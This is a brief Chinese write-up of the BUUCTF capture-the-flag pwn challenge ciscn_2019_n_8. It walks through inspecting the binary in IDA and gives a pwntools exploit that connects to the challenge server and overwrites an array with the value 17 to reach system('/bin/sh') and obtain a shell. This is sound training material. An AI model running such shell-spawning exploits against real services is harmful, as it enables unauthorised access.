[BUUCTF]PWN13——ciscn_2019_n_8
题目网址:https://buuoj.cn/challenges#ciscn_2019_n_8
步骤:
例行检查,32位,保护开的挺多,canary(栈保护),nx(堆栈不可执行),PIE(地址随机化)
nc一下,看看程序大概的执行情况
32位ida载入,shift+f12查看程序里的字符串,看到了system和bin/sh
双击跟进,ctrl+x查看哪里调用了这个字符串
很简单的一个程序,一开始让我们输入name,之后只要var[13]=17就会调用system(‘/bin/sh’)获取shell
我们只要将var这个数组里全部填上17即可通过判断
EXP
from pwn import*
r=remote('node3.buuoj.cn',26348)
payload=p32(17)*14
r.sendline(payload)
r.interactive()
一道简单的逻辑绕过,感觉跟保护机制没太大关系